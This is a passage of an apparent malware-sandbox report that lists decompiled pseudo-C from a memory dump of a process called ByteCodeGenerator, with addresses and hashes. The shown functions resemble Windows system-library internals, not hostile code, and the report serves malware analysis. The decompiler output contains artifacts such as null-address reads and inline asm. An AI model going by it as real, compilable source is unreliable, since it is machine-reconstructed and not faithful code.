                                  									 *_t102 = 1;
                                  									asm("lock xadd [edi], eax");
                                  									if(__eflags == 0) {
                                  										_t28 = _t102 + 4; // 0xffffffff
                                  										_push( *_t28);
                                  										E034695D0();
                                  										L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                  									}
                                  									continue;
                                  								}
                                  								_t93 =  &_v20;
                                  								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                  								_t85 = 6;
                                  								_v20 = _t85;
                                  								_t87 = E0345F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                  								__eflags = _t87;
                                  								if(_t87 < 0) {
                                  									goto L3;
                                  								}
                                  								 *((char*)(_t108 + 0xe)) = 1;
                                  								goto L15;
                                  							}
                                  							__eflags = _t53 - 0xc000026e;
                                  							if(__eflags != 0) {
                                  								goto L3;
                                  							}
                                  							goto L12;
                                  						}
                                  						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                  						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                  							goto L3;
                                  						} else {
                                  							goto L9;
                                  						}
                                  					}
                                  					L3:
                                  					_t49 = _t104;
                                  					goto L4;
                                  				}
                                  				_t49 = 0;
                                  				goto L4;
                                  			}

























                                  0x034252a5
                                  0x034252ad
                                  0x034252b0
                                  0x034252b3
                                  0x034252b7
                                  0x034252ba
                                  0x034252bf
                                  0x034252c4
                                  0x034252cc
                                  0x00000000
                                  0x00000000
                                  0x034252ce
                                  0x034252d9
                                  0x034252dd
                                  0x034252e7
                                  0x034252f7
                                  0x034252f9
                                  0x034252fd
                                  0x03480dcf
                                  0x03480dd5
                                  0x03480dd6
                                  0x03480dd7
                                  0x03480dd8
                                  0x03480dd9
                                  0x03480dde
                                  0x03480ddf
                                  0x03480de0
                                  0x03480de1
                                  0x03480de2
                                  0x03480de5
                                  0x03480dea
                                  0x03480dec
                                  0x03480f60
                                  0x03480f64
                                  0x03480f70
                                  0x03480f76
                                  0x03480f79
                                  0x03480f79
                                  0x00000000
                                  0x03480f64
                                  0x03480df2
                                  0x03480df7
                                  0x03480e04
                                  0x03480e0d
                                  0x03480e0d
                                  0x03480e10
                                  0x03480e1a
                                  0x03480e1c
                                  0x03480e4c
                                  0x03480e52
                                  0x03480e61
                                  0x03480e67
                                  0x03480e6b
                                  0x03480e70
                                  0x03480e76
                                  0x03480ed7
                                  0x03480edc
                                  0x03480ee0
                                  0x03480ee6
                                  0x03480eea
                                  0x03480eed
                                  0x03480ef0
                                  0x03480ef3
                                  0x03480ef6
                                  0x03480ef9
                                  0x03480efe
                                  0x03480f01
                                  0x03480f01
                                  0x03480f0b
                                  0x03480f12
                                  0x03480f16
                                  0x03480f18
                                  0x03480f1b
                                  0x03480f2c
                                  0x03480f31
                                  0x03480f31
                                  0x03480f35
                                  0x03480f39
                                  0x03480f3a
                                  0x03480f3c
                                  0x03480f3f
                                  0x03480f50
                                  0x03480f55
                                  0x03480f55
                                  0x03480f59
                                  0x034252eb
                                  0x034252f1
                                  0x034252f1
                                  0x03480e7d
                                  0x03480e84
                                  0x03480e88
                                  0x03480e8a
                                  0x03480e8d
                                  0x03480e9e
                                  0x03480ea3
                                  0x03480ea3
                                  0x03480ea7
                                  0x03480eaf
                                  0x03480eb3
                                  0x03480eb9
                                  0x03480eb9
                                  0x03480ebc
                                  0x03480ecd
                                  0x03480ecd
                                  0x00000000
                                  0x03480eb3
                                  0x03480e21
                                  0x03480e2b
                                  0x03480e2f
                                  0x03480e30
                                  0x03480e3a
                                  0x03480e3f
                                  0x03480e41
                                  0x00000000
                                  0x00000000
                                  0x03480e47
                                  0x00000000
                                  0x03480e47
                                  0x03480df9
                                  0x03480dfe
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03480dfe
                                  0x03425303
                                  0x03425307
                                  0x00000000
                                  0x03425309
                                  0x00000000
                                  0x03425309
                                  0x03425307
                                  0x034252e9
                                  0x034252e9
                                  0x00000000
                                  0x034252e9
                                  0x0342530e
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b43fe3095390ce6327451db65241ae8cdfa2f76b1aa2f7de162998dfd3a75dbb
                                  • Instruction ID: 5ac87cc4025afcae913e61008a21ed66a3e285c22db6851a4e265455f9db116c
                                  • Opcode Fuzzy Hash: b43fe3095390ce6327451db65241ae8cdfa2f76b1aa2f7de162998dfd3a75dbb
                                  • Instruction Fuzzy Hash: E551BC35205741AFD321EF29C840B2BBBE4BF45710F18095FE4A59F651E770E849CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E03452AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                  				signed short* _v8;
                                  				signed short* _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr* _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				short _t56;
                                  				signed int _t57;
                                  				intOrPtr _t58;
                                  				signed short* _t61;
                                  				intOrPtr _t72;
                                  				intOrPtr _t75;
                                  				intOrPtr _t84;
                                  				intOrPtr _t87;
                                  				intOrPtr* _t90;
                                  				signed short* _t91;
                                  				signed int _t95;
                                  				signed short* _t96;
                                  				intOrPtr _t97;
                                  				intOrPtr _t102;
                                  				signed int _t108;
                                  				intOrPtr _t110;
                                  				signed int _t111;
                                  				signed short* _t112;
                                  				void* _t113;
                                  				signed int _t116;
                                  				signed short** _t119;
                                  				short* _t120;
                                  				signed int _t123;
                                  				signed int _t124;
                                  				void* _t125;
                                  				intOrPtr _t127;
                                  				signed int _t128;
                                  
                                  				_t90 = __ecx;
                                  				_v16 = __edx;
                                  				_t108 = _a4;
                                  				_v28 = __ecx;
                                  				_t4 = _t108 - 1; // -1
                                  				if(_t4 > 0x13) {
                                  					L15:
                                  					_t56 = 0xc0000100;
                                  					L16:
                                  					return _t56;
                                  				}
                                  				_t57 = _t108 * 0x1c;
                                  				_v32 = _t57;
                                  				_t6 = _t57 + 0x3518204; // 0x0
                                  				_t123 =  *_t6;
                                  				_t7 = _t57 + 0x3518208; // 0x3518207
                                  				_t8 = _t57 + 0x3518208; // 0x3518207
                                  				_t119 = _t8;
                                  				_v36 = _t123;
                                  				_t110 = _t7 + _t123 * 8;
                                  				_v24 = _t110;
                                  				_t111 = _a4;
                                  				if(_t119 >= _t110) {
                                  					L12:
                                  					if(_t123 != 3) {
                                  						_t58 =  *0x3518450; // 0x0
                                  						if(_t58 == 0) {
                                  							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                  						}
                                  					} else {
                                  						_t26 = _t57 + 0x351821c; // 0x0
                                  						_t58 =  *_t26;
                                  					}
                                  					 *_t90 = _t58;
                                  					goto L15;
                                  				} else {
                                  					goto L2;
                                  				}
                                  				while(1) {
                                  					_t116 =  *_t61 & 0x0000ffff;
                                  					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                  					if(_t116 == _t128) {
                                  						goto L18;
                                  					}
                                  					L5:
                                  					if(_t116 >= 0x61) {
                                  						if(_t116 > 0x7a) {
                                  							_t97 =  *0x3516d5c; // 0x7f0a0654
                                  							_t72 =  *0x3516d5c; // 0x7f0a0654
                                  							_t75 =  *0x3516d5c; // 0x7f0a0654
                                  							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                  						} else {
                                  							_t116 = _t116 - 0x20;
                                  						}
                                  					}
                                  					if(_t128 >= 0x61) {
                                  						if(_t128 > 0x7a) {
                                  							_t102 =  *0x3516d5c; // 0x7f0a0654
                                  							_t84 =  *0x3516d5c; // 0x7f0a0654
                                  							_t87 =  *0x3516d5c; // 0x7f0a0654
                                  							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                  						} else {
                                  							_t128 = _t128 - 0x20;
                                  						}
                                  					}
                                  					if(_t116 == _t128) {
                                  						_t61 = _v12;
                                  						_t96 = _v8;
                                  					} else {
                                  						_t113 = _t116 - _t128;
                                  						L9:
                                  						_t111 = _a4;
                                  						if(_t113 == 0) {
                                  							_t115 =  &(( *_t119)[_t111 + 1]);
                                  							_t33 =  &(_t119[1]); // 0x100
                                  							_t120 = _a8;
                                  							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                  							_t35 = _t95 - 1; // 0xff
                                  							_t124 = _t35;
                                  							if(_t120 == 0) {
                                  								L27:
                                  								 *_a16 = _t95;
                                  								_t56 = 0xc0000023;
                                  								goto L16;
                                  							}
                                  							if(_t124 >= _a12) {
                                  								if(_a12 >= 1) {
                                  									 *_t120 = 0;
                                  								}
                                  								goto L27;
                                  							}
                                  							 *_a16 = _t124;
                                  							_t125 = _t124 + _t124;
                                  							E0346F3E0(_t120, _t115, _t125);
                                  							_t56 = 0;
                                  							 *((short*)(_t125 + _t120)) = 0;
                                  							goto L16;
                                  						}
                                  						_t119 =  &(_t119[2]);
                                  						if(_t119 < _v24) {
                                  							L2:
                                  							_t91 =  *_t119;
                                  							_t61 = _t91;
                                  							_v12 = _t61;
                                  							_t112 =  &(_t61[_t111]);
                                  							_v8 = _t112;
                                  							if(_t61 >= _t112) {
                                  								break;
                                  							} else {
                                  								_t127 = _v16 - _t91;
                                  								_t96 = _t112;
                                  								_v20 = _t127;
                                  								_t116 =  *_t61 & 0x0000ffff;
                                  								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                  								if(_t116 == _t128) {
                                  									goto L18;
                                  								}
                                  								goto L5;
                                  							}
                                  						} else {
                                  							_t90 = _v28;
                                  							_t57 = _v32;
                                  							_t123 = _v36;
                                  							goto L12;
                                  						}
                                  					}
                                  					L18:
                                  					_t61 =  &(_t61[1]);
                                  					_v12 = _t61;
                                  					if(_t61 >= _t96) {
                                  						break;
                                  					}
                                  					_t127 = _v20;
                                  				}
                                  				_t113 = 0;
                                  				goto L9;
                                  			}






































                                  0x03452ae4
                                  0x03452aec
                                  0x03452aef
                                  0x03452af4
                                  0x03452af7
                                  0x03452afd
                                  0x03452b92
                                  0x03452b92
                                  0x03452b97
                                  0x03452b9c
                                  0x03452b9c
                                  0x03452b03
                                  0x03452b06
                                  0x03452b09
                                  0x03452b09
                                  0x03452b0f
                                  0x03452b15
                                  0x03452b15
                                  0x03452b1b
                                  0x03452b1e
                                  0x03452b21
                                  0x03452b26
                                  0x03452b29
                                  0x03452b81
                                  0x03452b84
                                  0x03452c0e
                                  0x03452c15
                                  0x03452c24
                                  0x03452c24
                                  0x03452b8a
                                  0x03452b8a
                                  0x03452b8a
                                  0x03452b8a
                                  0x03452b90
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03452b4a
                                  0x03452b4a
                                  0x03452b4d
                                  0x03452b53
                                  0x00000000
                                  0x00000000
                                  0x03452b55
                                  0x03452b58
                                  0x03452bb7
                                  0x03495d1b
                                  0x03495d37
                                  0x03495d47
                                  0x03495d53
                                  0x03452bbd
                                  0x03452bbd
                                  0x03452bbd
                                  0x03452bb7
                                  0x03452b5d
                                  0x03452c2f
                                  0x03495d5b
                                  0x03495d77
                                  0x03495d87
                                  0x03495d93
                                  0x03452c35
                                  0x03452c35
                                  0x03452c35
                                  0x03452c2f
                                  0x03452b65
                                  0x03452b9f
                                  0x03452ba2
                                  0x03452b67
                                  0x03452b67
                                  0x03452b69
                                  0x03452b6b
                                  0x03452b6e
                                  0x03452bc9
                                  0x03452bcc
                                  0x03452bcf
                                  0x03452bd4
                                  0x03452bd6
                                  0x03452bd6
                                  0x03452bdb
                                  0x03452c02
                                  0x03452c05
                                  0x03452c07
                                  0x00000000
                                  0x03452c07
                                  0x03452be0
                                  0x03452c00
                                  0x03452c3f
                                  0x03452c3f
                                  0x00000000
                                  0x03452c00
                                  0x03452be5
                                  0x03452be7
                                  0x03452bec
                                  0x03452bf4
                                  0x03452bf6
                                  0x00000000
                                  0x03452bf6
                                  0x03452b70
                                  0x03452b76
                                  0x03452b2b
                                  0x03452b2b
                                  0x03452b2d
                                  0x03452b2f
                                  0x03452b32
                                  0x03452b35
                                  0x03452b3a
                                  0x00000000
                                  0x03452b40
                                  0x03452b43
                                  0x03452b45
                                  0x03452b47
                                  0x03452b4a
                                  0x03452b4d
                                  0x03452b53
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03452b53
                                  0x03452b78
                                  0x03452b78
                                  0x03452b7b
                                  0x03452b7e
                                  0x00000000
                                  0x03452b7e
                                  0x03452b76
                                  0x03452ba5
                                  0x03452ba5
                                  0x03452ba8
                                  0x03452bad
                                  0x00000000
                                  0x00000000
                                  0x03452baf
                                  0x03452baf
                                  0x03452bc2
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 157a73e2ae3b98c9a34ad701d986b315bbf548c8cda6f373527274cd3ff38d11
                                  • Instruction ID: 21c4a6c12a4564934454d7f3e1972a59ca886afb4ffacdd691beec90ac50ca2e
                                  • Opcode Fuzzy Hash: 157a73e2ae3b98c9a34ad701d986b315bbf548c8cda6f373527274cd3ff38d11
                                  • Instruction Fuzzy Hash: 59519076E001258FCB18DF1DC4809BDB7B1BB88700716895BFC56AF326D770AA52CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E034EAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed short* _t36;
                                  				signed int _t41;
                                  				char* _t42;
                                  				intOrPtr _t43;
                                  				signed int _t47;
                                  				void* _t52;
                                  				signed int _t57;
                                  				intOrPtr _t61;
                                  				signed char _t62;
                                  				signed int _t72;
                                  				signed char _t85;
                                  				signed int _t88;
                                  
                                  				_t73 = __edx;
                                  				_push(__ecx);
                                  				_t85 = __ecx;
                                  				_v8 = __edx;
                                  				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                  				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                  				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                  					_t57 = _t57 | 0x00000001;
                                  				}
                                  				_t88 = 0;
                                  				_t36 = 0;
                                  				_t96 = _a12;
                                  				if(_a12 == 0) {
                                  					_t62 = _a8;
                                  					__eflags = _t62;
                                  					if(__eflags == 0) {
                                  						goto L12;
                                  					}
                                  					_t52 = E034EC38B(_t85, _t73, _t57, 0);
                                  					_t62 = _a8;
                                  					 *_t62 = _t52;
                                  					_t36 = 0;
                                  					goto L11;
                                  				} else {
                                  					_t36 = E034EACFD(_t85, _t73, _t96, _t57, _a8);
                                  					if(0 == 0 || 0 == 0xffffffff) {
                                  						_t72 = _t88;
                                  					} else {
                                  						_t72 =  *0x00000000 & 0x0000ffff;
                                  					}
                                  					 *_a12 = _t72;
                                  					_t62 = _a8;
                                  					L11:
                                  					_t73 = _v8;
                                  					L12:
                                  					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                  						L19:
                                  						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                  							L22:
                                  							_t74 = _v8;
                                  							__eflags = _v8;
                                  							if(__eflags != 0) {
                                  								L25:
                                  								__eflags = _t88 - 2;
                                  								if(_t88 != 2) {
                                  									__eflags = _t85 + 0x44 + (_t88 << 6);
                                  									_t88 = E034EFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                  									goto L34;
                                  								}
                                  								L26:
                                  								_t59 = _v8;
                                  								E034EEA55(_t85, _v8, _t57);
                                  								asm("sbb esi, esi");
                                  								_t88 =  ~_t88;
                                  								_t41 = E03447D50();
                                  								__eflags = _t41;
                                  								if(_t41 == 0) {
                                  									_t42 = 0x7ffe0380;
                                  								} else {
                                  									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  								}
                                  								__eflags =  *_t42;
                                  								if( *_t42 != 0) {
                                  									_t43 =  *[fs:0x30];
                                  									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                  									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                  										__eflags = _t88;
                                  										if(_t88 != 0) {
                                  											E034E1608(_t85, _t59, 3);
                                  										}
                                  									}
                                  								}
                                  								goto L34;
                                  							}
                                  							_push(_t62);
                                  							_t47 = E034F1536(0x3518ae4, (_t74 -  *0x3518b04 >> 0x14) + (_t74 -  *0x3518b04 >> 0x14), _t88, __eflags);
                                  							__eflags = _t47;
                                  							if(_t47 == 0) {
                                  								goto L26;
                                  							}
                                  							_t74 = _v12;
                                  							_t27 = _t47 - 1; // -1
                                  							_t88 = _t27;
                                  							goto L25;
                                  						}
                                  						_t62 = _t85;
                                  						if(L034EC323(_t62, _v8, _t57) != 0xffffffff) {
                                  							goto L22;
                                  						}
                                  						_push(_t62);
                                  						_push(_t88);
                                  						E034EA80D(_t85, 9, _v8, _t88);
                                  						goto L34;
                                  					} else {
                                  						_t101 = _t36;
                                  						if(_t36 != 0) {
                                  							L16:
                                  							if(_t36 == 0xffffffff) {
                                  								goto L19;
                                  							}
                                  							_t62 =  *((intOrPtr*)(_t36 + 2));
                                  							if((_t62 & 0x0000000f) == 0) {
                                  								goto L19;
                                  							}
                                  							_t62 = _t62 & 0xf;
                                  							if(E034CCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                  								L34:
                                  								return _t88;
                                  							}
                                  							goto L19;
                                  						}
                                  						_t62 = _t85;
                                  						_t36 = E034EACFD(_t62, _t73, _t101, _t57, _t62);
                                  						if(_t36 == 0) {
                                  							goto L19;
                                  						}
                                  						goto L16;
                                  					}
                                  				}
                                  			}



















                                  0x034eae44
                                  0x034eae4c
                                  0x034eae53
                                  0x034eae55
                                  0x034eae5c
                                  0x034eae64
                                  0x034eae68
                                  0x034eae75
                                  0x034eae75
                                  0x034eae78
                                  0x034eae7a
                                  0x034eae7c
                                  0x034eae7f
                                  0x034eaea8
                                  0x034eaeab
                                  0x034eaead
                                  0x00000000
                                  0x00000000
                                  0x034eaeb3
                                  0x034eaeb8
                                  0x034eaebb
                                  0x034eaebd
                                  0x00000000
                                  0x034eae81
                                  0x034eae88
                                  0x034eae8f
                                  0x034eae9b
                                  0x034eae96
                                  0x034eae96
                                  0x034eae96
                                  0x034eaea0
                                  0x034eaea3
                                  0x034eaebf
                                  0x034eaebf
                                  0x034eaec3
                                  0x034eaec9
                                  0x034eaf0d
                                  0x034eaf14
                                  0x034eaf3d
                                  0x034eaf3d
                                  0x034eaf41
                                  0x034eaf44
                                  0x034eaf67
                                  0x034eaf67
                                  0x034eaf6a
                                  0x034eafca
                                  0x034eafd1
                                  0x00000000
                                  0x034eafd1
                                  0x034eaf6c
                                  0x034eaf6d
                                  0x034eaf75
                                  0x034eaf7c
                                  0x034eaf7e
                                  0x034eaf80
                                  0x034eaf85
                                  0x034eaf87
                                  0x034eaf99
                                  0x034eaf89
                                  0x034eaf92
                                  0x034eaf92
                                  0x034eaf9e
                                  0x034eafa1
                                  0x034eafa3
                                  0x034eafa9
                                  0x034eafb0
                                  0x034eafb2
                                  0x034eafb4
                                  0x034eafbc
                                  0x034eafbc
                                  0x034eafb4
                                  0x034eafb0
                                  0x00000000
                                  0x034eafa1
                                  0x034eaf4f
                                  0x034eaf57
                                  0x034eaf5c
                                  0x034eaf5e
                                  0x00000000
                                  0x00000000
                                  0x034eaf60
                                  0x034eaf64
                                  0x034eaf64
                                  0x00000000
                                  0x034eaf64
                                  0x034eaf1a
                                  0x034eaf25
                                  0x00000000
                                  0x00000000
                                  0x034eaf27
                                  0x034eaf28
                                  0x034eaf33
                                  0x00000000
                                  0x034eaed0
                                  0x034eaed0
                                  0x034eaed2
                                  0x034eaee1
                                  0x034eaee4
                                  0x00000000
                                  0x00000000
                                  0x034eaee6
                                  0x034eaeec
                                  0x00000000
                                  0x00000000
                                  0x034eaefb
                                  0x034eaf07
                                  0x034eafd3
                                  0x034eafdb
                                  0x034eafdb
                                  0x00000000
                                  0x034eaf07
                                  0x034eaed6
                                  0x034eaed8
                                  0x034eaedf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034eaedf
                                  0x034eaec9

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50086b0aac62c3ba35de91317514c2602e9451f4636d92b759f20846de7da704
                                  • Instruction ID: 54ffedfc5a8d484998446f74933280a871d4b1bf043db5e7574b1a0957d5ef42
                                  • Opcode Fuzzy Hash: 50086b0aac62c3ba35de91317514c2602e9451f4636d92b759f20846de7da704
                                  • Instruction Fuzzy Hash: 8641C4B1B007119FD726DB2AC894B3BF799AF84622F08461FF9168F390DB34D841C699
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0344DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                  				char _v5;
                                  				signed int _v12;
                                  				signed int* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr _v44;
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed int _t54;
                                  				char* _t58;
                                  				signed int _t66;
                                  				intOrPtr _t67;
                                  				intOrPtr _t68;
                                  				intOrPtr _t72;
                                  				intOrPtr _t73;
                                  				signed int* _t75;
                                  				intOrPtr _t79;
                                  				intOrPtr _t80;
                                  				char _t82;
                                  				signed int _t83;
                                  				signed int _t84;
                                  				signed int _t88;
                                  				signed int _t89;
                                  				intOrPtr _t90;
                                  				intOrPtr _t92;
                                  				signed int _t97;
                                  				intOrPtr _t98;
                                  				intOrPtr* _t99;
                                  				signed int* _t101;
                                  				signed int* _t102;
                                  				intOrPtr* _t103;
                                  				intOrPtr _t105;
                                  				signed int _t106;
                                  				void* _t118;
                                  
                                  				_t92 = __edx;
                                  				_t75 = _a4;
                                  				_t98 = __ecx;
                                  				_v44 = __edx;
                                  				_t106 = _t75[1];
                                  				_v40 = __ecx;
                                  				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                  					_t82 = 0;
                                  				} else {
                                  					_t82 = 1;
                                  				}
                                  				_v5 = _t82;
                                  				_t6 = _t98 + 0xc8; // 0xc9
                                  				_t101 = _t6;
                                  				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                  				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                  				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                  				if(_t82 != 0) {
                                  					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                  					_t83 =  *_t75;
                                  					_t54 = _t75[1];
                                  					 *_t101 = _t83;
                                  					_t84 = _t83 | _t54;
                                  					_t101[1] = _t54;
                                  					if(_t84 == 0) {
                                  						_t101[1] = _t101[1] & _t84;
                                  						 *_t101 = 1;
                                  					}
                                  					goto L19;
                                  				} else {
                                  					if(_t101 == 0) {
                                  						E0342CC50(E03424510(0xc000000d));
                                  						_t88 =  *_t101;
                                  						_t97 = _t101[1];
                                  						L15:
                                  						_v12 = _t88;
                                  						_t66 = _t88 -  *_t75;
                                  						_t89 = _t97;
                                  						asm("sbb ecx, [ebx+0x4]");
                                  						_t118 = _t89 - _t97;
                                  						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                  							_t66 = _t66 | 0xffffffff;
                                  							_t89 = 0x7fffffff;
                                  						}
                                  						 *_t101 = _t66;
                                  						_t101[1] = _t89;
                                  						L19:
                                  						if(E03447D50() != 0) {
                                  							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  						} else {
                                  							_t58 = 0x7ffe0386;
                                  						}
                                  						_t102 = _v16;
                                  						if( *_t58 != 0) {
                                  							_t58 = E034F8ED6(_t102, _t98);
                                  						}
                                  						_t76 = _v44;
                                  						E03442280(_t58, _v44);
                                  						E0344DD82(_v44, _t102, _t98);
                                  						E0344B944(_t102, _v5);
                                  						return E0343FFB0(_t76, _t98, _t76);
                                  					}
                                  					_t99 = 0x7ffe03b0;
                                  					do {
                                  						_t103 = 0x7ffe0010;
                                  						do {
                                  							_t67 =  *0x3518628; // 0x0
                                  							_v28 = _t67;
                                  							_t68 =  *0x351862c; // 0x0
                                  							_v32 = _t68;
                                  							_v24 =  *((intOrPtr*)(_t99 + 4));
                                  							_v20 =  *_t99;
                                  							while(1) {
                                  								_t97 =  *0x7ffe000c;
                                  								_t90 =  *0x7FFE0008;
                                  								if(_t97 ==  *_t103) {
                                  									goto L10;
                                  								}
                                  								asm("pause");
                                  							}
                                  							L10:
                                  							_t79 = _v24;
                                  							_t99 = 0x7ffe03b0;
                                  							_v12 =  *0x7ffe03b0;
                                  							_t72 =  *0x7FFE03B4;
                                  							_t103 = 0x7ffe0010;
                                  							_v36 = _t72;
                                  						} while (_v20 != _v12 || _t79 != _t72);
                                  						_t73 =  *0x3518628; // 0x0
                                  						_t105 = _v28;
                                  						_t80 =  *0x351862c; // 0x0
                                  					} while (_t105 != _t73 || _v32 != _t80);
                                  					_t98 = _v40;
                                  					asm("sbb edx, [ebp-0x20]");
                                  					_t88 = _t90 - _v12 - _t105;
                                  					_t75 = _a4;
                                  					asm("sbb edx, eax");
                                  					_t31 = _t98 + 0xc8; // 0x34efb53
                                  					_t101 = _t31;
                                  					 *_t101 = _t88;
                                  					_t101[1] = _t97;
                                  					goto L15;
                                  				}
                                  			}









































                                  0x0344dbe9
                                  0x0344dbf2
                                  0x0344dbf7
                                  0x0344dbf9
                                  0x0344dbfc
                                  0x0344dc00
                                  0x0344dc03
                                  0x0344dc14
                                  0x0344dd54
                                  0x0344dd54
                                  0x0344dd54
                                  0x0344dc18
                                  0x0344dc1d
                                  0x0344dc1d
                                  0x0344dc32
                                  0x0344dc3b
                                  0x0344dc3e
                                  0x0344dc46
                                  0x0344dd5b
                                  0x0344dd62
                                  0x0344dd64
                                  0x0344dd67
                                  0x0344dd69
                                  0x0344dd6b
                                  0x0344dd6e
                                  0x0344dd70
                                  0x0344dd73
                                  0x0344dd73
                                  0x00000000
                                  0x0344dc4c
                                  0x0344dc4e
                                  0x03493ae3
                                  0x03493ae8
                                  0x03493aea
                                  0x0344dce7
                                  0x0344dce9
                                  0x0344dcec
                                  0x0344dcee
                                  0x0344dcf0
                                  0x0344dcf3
                                  0x0344dcf5
                                  0x03493af2
                                  0x03493af5
                                  0x03493af5
                                  0x0344dd06
                                  0x0344dd08
                                  0x0344dd0b
                                  0x0344dd12
                                  0x03493b08
                                  0x0344dd18
                                  0x0344dd18
                                  0x0344dd18
                                  0x0344dd20
                                  0x0344dd23
                                  0x03493b16
                                  0x03493b16
                                  0x0344dd29
                                  0x0344dd2d
                                  0x0344dd36
                                  0x0344dd40
                                  0x0344dd51
                                  0x0344dd51
                                  0x0344dc54
                                  0x0344dc59
                                  0x0344dc59
                                  0x0344dc5e
                                  0x0344dc5e
                                  0x0344dc63
                                  0x0344dc66
                                  0x0344dc6b
                                  0x0344dc78
                                  0x0344dc7b
                                  0x0344dc81
                                  0x0344dc81
                                  0x0344dc83
                                  0x0344dc89
                                  0x00000000
                                  0x00000000
                                  0x0344dd7b
                                  0x0344dd7b
                                  0x0344dc8f
                                  0x0344dc8f
                                  0x0344dc92
                                  0x0344dc99
                                  0x0344dc9f
                                  0x0344dca5
                                  0x0344dcaa
                                  0x0344dcaa
                                  0x0344dcb3
                                  0x0344dcb8
                                  0x0344dcbb
                                  0x0344dcc1
                                  0x0344dccf
                                  0x0344dcd2
                                  0x0344dcd5
                                  0x0344dcd7
                                  0x0344dcda
                                  0x0344dcdc
                                  0x0344dcdc
                                  0x0344dce2
                                  0x0344dce4
                                  0x00000000
                                  0x0344dce4

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
